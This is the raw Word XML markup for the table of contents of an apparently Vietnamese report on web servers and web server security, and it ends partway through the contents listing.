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61EB6" w14:textId="46F68CFD" w:rsidR="006A0D62" w:rsidRDefault="009B6DF7" w:rsidP="008317D6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc171085470"/>
      <w:r>
        <w:t>MỤC LỤC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="1287695792"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="31D95700" w14:textId="4F468320" w:rsidR="0039084A" w:rsidRDefault="0039084A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="081F941E" w14:textId="20D4EDD4" w:rsidR="0039084A" w:rsidRDefault="0039084A">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71085470" w:history="1">
            <w:r w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MỤC LỤC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085470 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E81E823" w14:textId="4E87149E" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085471" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DANH MỤC ẢNH MINH HỌA</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085471 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>iii</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18B36B1F" w14:textId="100068C9" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085472" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DANH MỤC VIẾT TẮT</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085472 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>iv</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36214706" w14:textId="7B6C889F" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085473" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LỜI MỞ ĐẦU</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085473 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35AE84F3" w14:textId="65396EA5" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085474" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tính cấp thiết của đề tài</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085474 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="032F3AF8" w14:textId="723E343C" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085475" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mục tiêu nghiên cứu của đề tài</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085475 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45F5E3A8" w14:textId="6B531061" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085476" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHƯƠNG 1: GIỚI THIỆU CHUNG VỀ WEB SERVER</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085476 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="052B7A48" w14:textId="23B3DE11" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085477" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Khái niệm về Web Server</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085477 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FFEC2E4" w14:textId="5A570F76" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085478" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chức năng của Web Server</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085478 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B87A183" w14:textId="420EDF37" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085479" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cách thức hoạt động của Web Server</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085479 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D4BDBA8" w14:textId="743249CE" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085480" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Các loại Web Server phổ biến</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085480 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2236974C" w14:textId="101DA9C7" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085481" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHƯƠNG 2: TỔNG QUAN VỀ BẢO MẬT WEB SERVER</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085481 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2356FB3A" w14:textId="12BB5978" w:rsidR="0039084A" w:rsidRDefault="007C0A15">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc171085483" w:history="1">
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A" w:rsidRPr="00B64A2B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Khái niệm về bảo mật</w:t>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc171085483 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0039084A">
              <w:rPr>
                <w:noProof/>
